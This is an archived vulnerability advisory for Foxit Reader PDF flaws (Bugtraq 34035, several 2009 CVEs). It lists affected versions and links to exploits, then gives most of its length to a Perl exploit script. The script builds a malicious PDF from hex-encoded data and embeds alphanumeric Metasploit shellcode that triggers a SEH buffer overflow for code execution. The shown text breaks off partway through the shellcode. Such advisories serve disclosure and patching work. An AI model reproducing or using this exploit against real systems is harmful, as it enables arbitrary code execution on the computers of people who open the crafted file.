Foxit Reader PDF Handling Multiple Remote Vulnerabilities
Written by Alin Rad Pop and Core Security Technologies   
Thursday, 26 March 2009 22:46


-\\Bugtraq ID:
34035

-\\Class:
Boundary Condition Error

-\\CVE:
CVE-2009-0191
CVE-2009-0836
CVE-2009-0837


-\\Remote:
Yes

-\\Local:
No

-\\Published:
Mar 09 2009 12:00AM

-\\Updated:
Mar 26 2009 05:06PM

-\\Credit:
Alin Rad Pop and Core Security Technologies



-\\Vulnerable:
Foxit Foxit Reader 3.0.2009 1301
Foxit Foxit Reader  3.0
Foxit Foxit Reader  2.3



-\\Not Vulnerable:
Foxit Foxit Reader  3.0 Build 1506
Foxit Foxit Reader  2.3 Build 3902



-\\Discussion
Foxit Reader is prone to multiple remote vulnerabilities.

Attackers may leverage these issues to execute arbitrary code in the context of the application.
Successful exploits may compromise the application and the underlying computer. Failed attacks
will cause denial-of-service conditions.

The issues affect Foxit Reader 3.0.2009.1301, 3.0, and 2.3. Other versions may also be affected.



-\\Exploit(s)/PoC(s):
The following exploits are available to members of the Immunity Partners program:

https://www.immunityinc.com/downloads/immpartners/FoxitLaunchit.tar.gz
https://www.immunityinc.com/downloads/immpartners/foxit_Action.tar

Multiple exploit examples are available.

UPDATE (March 26, 2009): The buffer-overflow issue is being exploited in the wild.
Please see the references for more information.
============================
http://www.securityfocus.com/data/vulnerabilities/exploits/core-2009-0218-poc-authorization-bypass.pdf
http://www.securityfocus.com/data/vulnerabilities/exploits/core-2009-0218-poc-bof.pdf
=====================================================
34035.pl
^^^^^^^^^
#!/usr/bin/perl
#
# Foxit Reader 3.0 (<= Build 1301) PDF Buffer Overflow Exploit
# ------------------------------------------------------------
# Exploit by SkD
#
# A SEH overflow occurs in this vulnerability in the popular
# Foxit Reader. The latest build (1506) is not affected but
# previous are. SafeSEH is a bitch in this one, but nothing
# is impossible :).
#
# Exploit written for Windows XP SP3.
#
# Credits to CORE Sec.
#
# Note: Author is not responsible for any damage done with this.

use strict;
use warnings;

my $pdf_data1 = "\x25\x50\x44\x46\x2D\x31\x2E\x34\x0D\x0A\x25\xA1\xB3\xC5\xD7\x0D\x0A\x31\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70".
            "\x65\x2F\x50\x61\x67\x65\x2F\x50\x61\x72\x65\x6E\x74\x20\x34\x20\x30\x20\x52\x20\x2F\x52\x65\x73\x6F\x75\x72\x63\x65\x73\x20\x36".
            "\x20\x30\x20\x52\x20\x2F\x4D\x65\x64\x69\x61\x42\x6F\x78\x5B\x20\x30\x20\x30\x20\x35\x39\x35\x20\x38\x34\x32\x5D\x2F\x47\x72\x6F".
            "\x75\x70\x3C\x3C\x2F\x53\x2F\x54\x72\x61\x6E\x73\x70\x61\x72\x65\x6E\x63\x79\x2F\x43\x53\x2F\x44\x65\x76\x69\x63\x65\x52\x47\x42".
            "\x2F\x49\x20\x74\x72\x75\x65\x3E\x3E\x2F\x43\x6F\x6E\x74\x65\x6E\x74\x73\x20\x32\x20\x30\x20\x52\x20\x2F\x41\x6E\x6E\x6F\x74\x73".
            "\x5B\x20\x39\x20\x30\x20\x52\x20\x20\x32\x34\x20\x30\x20\x52\x20\x20\x32\x35\x20\x30\x20\x52\x20\x5D\x3E\x3E\x0D\x0A\x65\x6E\x64".
            "\x6F\x62\x6A\x0D\x0A\x32\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x4C\x65\x6E\x67\x74\x68\x20\x33\x20\x30\x20\x52\x20\x2F\x46".
            "\x69\x6C\x74\x65\x72\x2F\x46\x6C\x61\x74\x65\x44\x65\x63\x6F\x64\x65\x3E\x3E\x73\x74\x72\x65\x61\x6D\x0D\x0A\x78\x9C\x33\xD0\x33".
            "\x54\x28\xE7\x2A\x54\x30\x50\x30\x00\xB2\x4C\x2D\x4D\xF5\x8C\x15\x2C\x4C\x0C\xF5\x2C\x15\x8A\x52\x15\xC2\xB5\x14\xF2\xB8\x02\x15".
            "\x00\x87\xEB\x07\x8A\x0D\x0A\x65\x6E\x64\x73\x74\x72\x65\x61\x6D\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x33\x20\x30\x20\x6F\x62".
            "\x6A\x0D\x0A\x20\x34\x32\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x34\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70\x65".
            "\x2F\x50\x61\x67\x65\x73\x2F\x52\x65\x73\x6F\x75\x72\x63\x65\x73\x20\x36\x20\x30\x20\x52\x20\x2F\x4D\x65\x64\x69\x61\x42\x6F\x78".
            "\x5B\x20\x30\x20\x30\x20\x35\x39\x35\x20\x38\x34\x32\x5D\x2F\x4B\x69\x64\x73\x5B\x20\x31\x20\x30\x20\x52\x20\x5D\x2F\x43\x6F\x75".
            "\x6E\x74\x20\x31\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x35\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x5A\x69\x54\x69".
            "\x20\x31\x38\x20\x30\x20\x52\x20\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x36\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F".
            "\x46\x6F\x6E\x74\x20\x35\x20\x30\x20\x52\x20\x2F\x50\x72\x6F\x63\x53\x65\x74\x5B\x2F\x50\x44\x46\x2F\x54\x65\x78\x74\x5D\x3E\x3E".
            "\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x37\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70\x65\x2F\x43\x61\x74\x61\x6C".
            "\x6F\x67\x2F\x50\x61\x67\x65\x73\x20\x34\x20\x30\x20\x52\x20\x2F\x4F\x70\x65\x6E\x41\x63\x74\x69\x6F\x6E\x5B\x20\x31\x20\x30\x20".
            "\x52\x20\x2F\x58\x59\x5A\x20\x6E\x75\x6C\x6C\x20\x6E\x75\x6C\x6C\x20\x30\x5D\x2F\x4C\x61\x6E\x67\x28\x65\x6E\x2D\x55\x53\x29\x3E".
            "\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x38\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x41\x75\x74\x68\x6F\x72\x28\xFE\xFF".
            "\x00\x6D\x00\x61\x00\x72\x00\x63\x00\x69\x00\x61\x00\x6E\x00\x6F\x29\x2F\x43\x72\x65\x61\x74\x6F\x72\x28\xFE\xFF\x00\x57\x00\x72".
            "\x00\x69\x00\x74\x00\x65\x00\x72\x29\x2F\x50\x72\x6F\x64\x75\x63\x65\x72\x28\xFE\xFF\x00\x4F\x00\x70\x00\x65\x00\x6E\x00\x4F\x00".
            "\x66\x00\x66\x00\x69\x00\x63\x00\x65\x00\x2E\x00\x6F\x00\x72\x00\x67\x00\x20\x00\x33\x00\x2E\x00\x30\x29\x2F\x43\x72\x65\x61\x74".
            "\x69\x6F\x6E\x44\x61\x74\x65\x28\x44\x3A\x32\x30\x30\x39\x30\x32\x31\x39\x31\x34\x34\x35\x34\x39\x2D\x30\x32\x27\x30\x30\x27\x29".
            "\x2F\x4D\x6F\x64\x44\x61\x74\x65\x28\x44\x3A\x32\x30\x30\x39\x30\x32\x31\x39\x31\x34\x34\x38\x31\x35\x2D\x30\x32\x27\x30\x30\x27".
            "\x29\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x31\x35\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70\x65\x2F\x46".
            "\x69\x6C\x65\x73\x70\x65\x63\x2F\x46\x28\x63\x75\x61\x6C\x71\x75\x69\x65\x72\x61\x29\x2F\x46\x53\x2F\x55\x52\x4C\x3E\x3E\x0D\x0A".
            "\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x31\x34\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x53\x2F\x4D\x43\x44\x2F\x43\x54\x28\x61\x70".
            "\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x66\x75\x74\x75\x72\x65\x73\x70\x6C\x61\x73\x68\x29\x2F\x50\x3C\x3C\x2F\x54\x46\x28\x54".
            "\x45\x4D\x50\x41\x43\x43\x45\x53\x53\x29\x3E\x3E\x2F\x44\x20\x31\x35\x20\x30\x20\x52\x20\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A".
            "\x0D\x0A\x31\x33\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x53\x2F\x4D\x52\x2F\x43\x20\x31\x34\x20\x30\x20\x52\x20\x2F\x4E\x28".
            "\x63\x75\x61\x6C\x71\x75\x69\x65\x72\x61\x29\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x31\x32\x20\x30\x20\x6F\x62\x6A\x0D".
            "\x0A\x3C\x3C\x2F\x54\x79\x70\x65\x2F\x41\x63\x74\x69\x6F\x6E\x2F\x53\x2F\x52\x65\x6E\x64\x69\x74\x69\x6F\x6E\x2F\x4F\x50\x20\x34".
            "\x2F\x41\x4E\x20\x39\x20\x30\x20\x52\x20\x2F\x52\x20\x31\x33\x20\x30\x20\x52\x20\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A".
            "\x31\x31\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70\x65\x2F\x45\x78\x74\x47\x53\x74\x61\x74\x65\x2F\x43\x41\x20\x31".
            "\x2F\x63\x61\x20\x31\x2F\x41\x49\x53\x20\x66\x61\x6C\x73\x65\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x31\x30\x20\x30\x20".
            "\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x4D\x61\x74\x72\x69\x78\x5B\x20\x31\x20\x30\x20\x30\x20\x31\x20\x30\x20\x30\x5D\x2F\x42\x42\x6F".
            "\x78\x5B\x20\x30\x20\x30\x20\x31\x33\x30\x2E\x31\x33\x39\x20\x32\x37\x2E\x32\x38\x39\x37\x5D\x2F\x52\x65\x73\x6F\x75\x72\x63\x65".
            "\x73\x3C\x3C\x2F\x45\x78\x74\x47\x53\x74\x61\x74\x65\x3C\x3C\x2F\x49\x6D\x61\x67\x65\x4F\x70\x61\x63\x69\x74\x79\x20\x31\x31\x20".
            "\x30\x20\x52\x20\x3E\x3E\x3E\x3E\x2F\x4C\x65\x6E\x67\x74\x68\x20\x35\x34\x2F\x46\x69\x6C\x74\x65\x72\x2F\x46\x6C\x61\x74\x65\x44".
            "\x65\x63\x6F\x64\x65\x3E\x3E\x73\x74\x72\x65\x61\x6D\x0D\x0A\x78\x9C\x2B\xE4\x2A\xE4\x32\x50\x00\xC1\xA2\x74\x30\xC3\xD0\xD8\x40".
            "\xCF\xD0\xD8\x52\xC1\xC8\x5C\xCF\xC8\xC2\xD2\x5C\xA1\x28\x95\xCB\x50\x01\x08\x8D\x2C\x20\xC2\xA6\x70\xE1\x34\x2D\xAE\x40\x20\x04".
            "\x00\xBD\x52\x0D\x43\x0D\x0A\x65\x6E\x64\x73\x74\x72\x65\x61\x6D\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x39\x20\x30\x20\x6F\x62".
            "\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70\x65\x2F\x41\x6E\x6E\x6F\x74\x2F\x53\x75\x62\x74\x79\x70\x65\x2F\x53\x63\x72\x65\x65\x6E\x2F".
            "\x50\x20\x31\x20\x30\x20\x52\x20\x2F\x4D\x28\x44\x3A\x32\x30\x30\x39\x30\x32\x31\x39\x31\x34\x34\x37\x35\x36\x2D\x30\x32\x27\x30".
            "\x30\x27\x29\x2F\x46\x20\x34\x2F\x52\x65\x63\x74\x5B\x20\x32\x30\x35\x2E\x31\x35\x33\x20\x38\x30\x36\x2E\x31\x38\x32\x20\x33\x33".
            "\x35\x2E\x32\x39\x31\x20\x38\x33\x33\x2E\x34\x37\x32\x5D\x2F\x42\x53\x3C\x3C\x2F\x53\x2F\x53\x2F\x57\x20\x31\x3E\x3E\x2F\x42\x45".
            "\x3C\x3C\x2F\x53\x2F\x53\x3E\x3E\x2F\x4D\x4B\x3C\x3C\x2F\x42\x43\x5B\x20\x30\x20\x30\x20\x31\x5D\x2F\x52\x20\x30\x2F\x49\x46\x3C".
            "\x3C\x2F\x53\x57\x2F\x41\x2F\x53\x2F\x41\x2F\x46\x42\x20\x66\x61\x6C\x73\x65\x2F\x41\x5B\x20\x30\x2E\x35\x20\x30\x2E\x35\x5D\x3E".
            "\x3E\x3E\x3E\x2F\x41\x50\x3C\x3C\x2F\x4E\x20\x31\x30\x20\x30\x20\x52\x20\x3E\x3E\x2F\x54\x28\x63\x75\x61\x6C\x71\x75\x69\x65\x72".
            "\x61\x29\x2F\x41\x20\x31\x32\x20\x30\x20\x52\x20\x2F\x41\x41\x20\x31\x37\x20\x30\x20\x52\x20\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62".
            "\x6A\x0D\x0A\x32\x35\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70\x65\x2F\x41\x6E\x6E\x6F\x74\x2F\x53\x75\x62\x74\x79".
            "\x70\x65\x2F\x50\x6F\x70\x75\x70\x2F\x50\x20\x31\x20\x30\x20\x52\x20\x2F\x4D\x28\x44\x3A\x32\x30\x30\x39\x30\x32\x31\x39\x31\x34".
            "\x34\x38\x31\x35\x2D\x30\x32\x27\x30\x30\x27\x29\x2F\x46\x20\x32\x38\x2F\x52\x65\x63\x74\x5B\x20\x30\x20\x30\x20\x30\x20\x30\x5D".
            "\x2F\x4F\x70\x65\x6E\x20\x66\x61\x6C\x73\x65\x2F\x50\x61\x72\x65\x6E\x74\x20\x32\x34\x20\x30\x20\x52\x20\x3E\x3E\x0D\x0A\x65\x6E".
            "\x64\x6F\x62\x6A\x0D\x0A\x32\x34\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x53\x75\x62\x74\x79\x70\x65\x2F\x46\x72\x65\x65\x54".
            "\x65\x78\x74\x2F\x52\x65\x63\x74\x5B\x20\x32\x38\x35\x20\x37\x39\x34\x20\x35\x34\x31\x20\x38\x32\x37\x5D\x2F\x46\x20\x34\x2F\x41".
            "\x50\x20\x31\x39\x20\x30\x20\x52\x20\x2F\x46\x6F\x78\x69\x74\x54\x61\x67\x20\x32\x33\x20\x30\x20\x52\x20\x2F\x50\x20\x31\x20\x30".
            "\x20\x52\x20\x2F\x50\x6F\x70\x75\x70\x20\x32\x35\x20\x30\x20\x52\x20\x2F\x46\x4E\x28\x48\x65\x6C\x76\x65\x74\x69\x63\x61\x29\x2F".
            "\x43\x6F\x6E\x74\x65\x6E\x74\x73\x28\x45\x64\x69\x74\x65\x64\x20\x62\x79\x20\x46\x6F\x78\x69\x74\x20\x52\x65\x61\x64\x65\x72\x5C".
            "\x72\x43\x6F\x70\x79\x72\x69\x67\x68\x74\x5C\x28\x43\x5C\x29\x20\x62\x79\x20\x46\x6F\x78\x69\x74\x20\x53\x6F\x66\x74\x77\x61\x72".
            "\x65\x20\x43\x6F\x6D\x70\x61\x6E\x79\x2C\x32\x30\x30\x35\x2D\x32\x30\x30\x38\x5C\x72\x46\x6F\x72\x20\x45\x76\x61\x6C\x75\x61\x74".
            "\x69\x6F\x6E\x20\x4F\x6E\x6C\x79\x2E\x5C\x72\x29\x2F\x42\x4B\x43\x20\x36\x35\x35\x33\x35\x2F\x51\x20\x30\x2F\x44\x41\x28\x2F\x5A".
            "\x69\x54\x69\x20\x31\x31\x20\x54\x66\x20\x31\x20\x30\x20\x30\x20\x72\x67\x20\x31\x20\x30\x20\x30\x20\x31\x20\x32\x38\x35\x20\x38".
            "\x31\x30\x2E\x35\x20\x54\x6D\x20\x30\x20\x54\x63\x20\x31\x30\x30\x20\x54\x7A\x29\x2F\x49\x54\x2F\x46\x72\x65\x65\x54\x65\x78\x74".
            "\x54\x79\x70\x65\x77\x72\x69\x74\x65\x72\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x32\x33\x20\x30\x20\x6F\x62\x6A\x0D\x0A".
            "\x3C\x3C\x2F\x54\x65\x78\x74\x4D\x61\x74\x72\x69\x78\x5B\x20\x31\x20\x30\x20\x30\x20\x31\x20\x32\x38\x35\x20\x38\x31\x30\x2E\x35".
            "\x5D\x2F\x4C\x69\x63\x65\x6E\x73\x65\x28\x45\x76\x61\x6C\x75\x61\x74\x69\x6F\x6E\x29\x2F\x4D\x65\x6E\x64\x65\x72\x46\x6C\x61\x67".
            "\x28\x45\x76\x61\x6C\x75\x61\x74\x69\x6F\x6E\x2C\x41\x4E\x4E\x4F\x54\x29\x2F\x46\x6F\x6E\x74\x4E\x61\x6D\x65\x28\x48\x65\x6C\x76".
            "\x65\x74\x69\x63\x61\x29\x2F\x46\x6F\x6E\x74\x53\x69\x7A\x65\x20\x31\x31\x2F\x54\x65\x78\x74\x28\x45\x64\x69\x74\x65\x64\x20\x62".
            "\x79\x20\x46\x6F\x78\x69\x74\x20\x52\x65\x61\x64\x65\x72\x5C\x72\x43\x6F\x70\x79\x72\x69\x67\x68\x74\x5C\x28\x43\x5C\x29\x20\x62".
            "\x79\x20\x46\x6F\x78\x69\x74\x20\x53\x6F\x66\x74\x77\x61\x72\x65\x20\x43\x6F\x6D\x70\x61\x6E\x79\x2C\x32\x30\x30\x35\x2D\x32\x30".
            "\x30\x38\x5C\x72\x46\x6F\x72\x20\x45\x76\x61\x6C\x75\x61\x74\x69\x6F\x6E\x20\x4F\x6E\x6C\x79\x2E\x5C\x72\x29\x2F\x43\x68\x61\x72".
            "\x43\x6F\x6C\x6F\x72\x20\x32\x35\x35\x2F\x43\x68\x61\x72\x53\x70\x61\x63\x65\x20\x30\x2F\x4C\x69\x6E\x65\x46\x65\x65\x64\x20\x30".
            "\x2F\x48\x6F\x72\x7A\x53\x63\x61\x6C\x65\x20\x31\x30\x30\x2F\x4F\x72\x69\x67\x69\x6E\x58\x20\x32\x38\x35\x2F\x4F\x72\x69\x67\x69".
            "\x6E\x59\x20\x38\x31\x36\x2F\x62\x43\x68\x61\x6E\x67\x65\x42\x6F\x78\x20\x30\x2F\x42\x6F\x78\x57\x69\x64\x74\x68\x20\x32\x35\x36".
            "\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x32\x32\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x4D\x79\x46\x6F\x6E\x74\x20".
            "\x31\x38\x20\x30\x20\x52\x20\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x32\x31\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F".
            "\x46\x6F\x6E\x74\x20\x32\x32\x20\x30\x20\x52\x20\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x32\x30\x20\x30\x20\x6F\x62\x6A".
            "\x0D\x0A\x3C\x3C\x2F\x4C\x65\x6E\x67\x74\x68\x20\x31\x36\x38\x2F\x53\x75\x62\x74\x79\x70\x65\x2F\x46\x6F\x72\x6D\x2F\x42\x42\x6F".
            "\x78\x5B\x20\x32\x38\x35\x20\x37\x39\x34\x20\x35\x34\x31\x20\x38\x32\x37\x5D\x2F\x52\x65\x73\x6F\x75\x72\x63\x65\x73\x20\x32\x31".
            "\x20\x30\x20\x52\x20\x2F\x46\x69\x6C\x74\x65\x72\x2F\x46\x6C\x61\x74\x65\x44\x65\x63\x6F\x64\x65\x3E\x3E\x73\x74\x72\x65\x61\x6D".
            "\x0D\x0A\x78\x9C\x95\x8D\xCD\x0E\x82\x30\x10\x84\xEF\x7D\x8A\x3D\x42\xA2\xD8\x16\x88\x78\x15\xE1\x66\x4C\xB4\x2F\x50\x43\xC1\x1A".
            "\xE8\x92\xA6\xFE\xF4\xED\x25\x24\x28\x89\x27\xF6\x30\x99\x99\x6C\xBE\xD9\x0B\xB2\x39\xFA\x12\x8D\x03\xC6\x40\xD4\x84\x45\x74\x3C".
            "\xA0\x7F\xC6\x36\x84\xC1\x90\x81\x01\xCF\xD2\xA9\xDD\xEE\x92\xC9\x8A\x8E\x7C\x9F\x79\x12\xC5\x9C\x51\x3A\x40\x0F\x24\x28\x2A\xED".
            "\x54\x05\x57\x0F\x25\xBE\xB5\x83\xB3\x92\x95\xB2\x21\x88\xFB\x02\x24\x8B\xE7\xC8\x1C\x7B\x6F\x75\x73\x73\x41\x1E\xFE\xC0\x17\xAC".
            "\xDD\x4B\x5A\x05\x39\x76\xBD\x34\x7E\xC5\x29\x4D\xD7\x83\x64\x0B\xC7\xF8\x7C\xAB\x44\x0B\xC5\x53\xB6\x0F\xE9\x34\x1A\x38\x99\xD6".
            "\x47\x23\xAF\x10\xE4\x03\x4A\x14\x4C\x32\x0D\x0A\x65\x6E\x64\x73\x74\x72\x65\x61\x6D\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x31".
            "\x39\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x4E\x20\x32\x30\x20\x30\x20\x52\x20\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D".
            "\x0A\x31\x38\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70\x65\x2F\x46\x6F\x6E\x74\x2F\x53\x75\x62\x74\x79\x70\x65\x2F".
            "\x54\x79\x70\x65\x31\x2F\x42\x61\x73\x65\x46\x6F\x6E\x74\x2F\x48\x65\x6C\x76\x65\x74\x69\x63\x61\x2F\x45\x6E\x63\x6F\x64\x69\x6E".
            "\x67\x2F\x57\x69\x6E\x41\x6E\x73\x69\x45\x6E\x63\x6F\x64\x69\x6E\x67\x2F\x46\x78\x54\x61\x67\x20\x31\x3E\x3E\x0D\x0A\x65\x6E\x64".
            "\x6F\x62\x6A\x0D\x0A\x31\x37\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x50\x56\x20\x31\x36\x20\x30\x20\x52\x20\x3E\x3E\x0D\x0A".
            "\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x31\x36\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70\x65\x2F\x41\x63\x74\x69\x6F\x6E".
            "\x2F\x53\x2F\x4C\x61\x75\x6E\x63\x68\x2F\x46\x3C\x3C\x2F\x46\x28\x2F\x43\x2F";
my $pdf_data2 = "\x29\x3E\x3E\x2F\x4E\x65\x77\x57\x69\x6E\x64\x6F\x77\x20\x74\x72\x75\x65\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x78\x72".
            "\x65\x66\x0D\x0A\x30\x20\x32\x36\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x20\x36\x35\x35\x33\x36\x20\x66\x0D\x0A\x30\x30".
            "\x30\x30\x30\x30\x30\x30\x31\x37\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x31\x39\x37\x20\x30\x30\x30".
            "\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x33\x31\x34\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30".
            "\x30\x33\x33\x36\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x34\x33\x32\x20\x30\x30\x30\x30\x30\x20\x6E".
            "\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x34\x36\x38\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x35\x32\x32".
            "\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x36\x31\x39\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30".
            "\x30\x30\x30\x30\x31\x33\x37\x30\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x31\x31\x34\x37\x20\x30\x30\x30".
            "\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x31\x30\x38\x38\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30".
            "\x31\x30\x31\x35\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x39\x36\x32\x20\x30\x30\x30\x30\x30\x20\x6E".
            "\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x38\x37\x32\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x38\x31\x33".
            "\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x32\x39\x38\x34\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30".
            "\x30\x30\x30\x30\x32\x39\x34\x39\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x32\x38\x34\x39\x20\x30\x30\x30".
            "\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x32\x38\x31\x35\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30".
            "\x32\x35\x32\x30\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x32\x34\x38\x33\x20\x30\x30\x30\x30\x30\x20\x6E".
            "\x0D\x0A\x30\x30\x30\x30\x30\x30\x32\x34\x34\x34\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x32\x31\x30\x32".
            "\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x31\x37\x36\x36\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30".
            "\x30\x30\x30\x30\x31\x36\x33\x35\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x74\x72\x61\x69\x6C\x65\x72\x0D\x0A\x3C\x3C\x2F\x52\x6F".
            "\x6F\x74\x20\x37\x20\x30\x20\x52\x20\x2F\x49\x6E\x66\x6F\x20\x38\x20\x30\x20\x52\x20\x2F\x49\x44\x5B\x28\xDF\xB0\x2B\xEC\xF3\x6B".
            "\xFA\x01\x9C\xBC\x4B\x06\x11\x7C\x78\x79\x29\x28\xDF\xB0\x2B\xEC\xF3\x6B\xFA\x01\x9C\xBC\x4B\x06\x11\x7C\x78\x79\x29\x5D\x2F\x44".
            "\x6F\x63\x43\x68\x65\x63\x6B\x73\x75\x6D\x2F\x37\x36\x33\x36\x30\x32\x39\x46\x42\x32\x42\x32\x46\x44\x32\x39\x42\x43\x33\x34\x41".
            "\x42\x43\x33\x32\x43\x46\x34\x35\x42\x38\x46\x2F\x53\x69\x7A\x65\x20\x32\x36\x3E\x3E\x0D\x0A\x73\x74\x61\x72\x74\x78\x72\x65\x66".
            "\x0D\x0A\x38\x30\x35\x37\x0D\x0A\x25\x25\x45\x4F\x46\x0D\x0A";

# win32_exec -  EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x50\x42\x30\x42\x50\x4b\x58\x45\x44\x4e\x43\x4b\x58\x4e\x37".
"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x41\x4b\x58".
"\x4f\x55\x42\x32\x41\x30\x4b\x4e\x49\x44\x4b\x38\x46\x53\x4b\x58".
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c".
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x37\x45\x4e\x4b\x48".
"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x30\x4b\x54".
"\x4b\x48\x4f\x55\x4e\x41\x41\x50\x4b\x4e\x4b\x48\x4e\x31\x4b\x38".
"\x41\x30\x4b\x4e\x49\x58\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
"\x42\x4c\x46\x46\x4b\x58\x42\x44\x42\x33\x45\x38\x42\x4c\x4a\x47".
"\x4e\x30\x4b\x48\x42\x34\x4e\x50\x4b\x48\x42\x37\x4e\x51\x4d\x4a".
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x58\x42\x48\x42\x4b".
"\x42\x30\x42\x30\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x35\x41\x43".
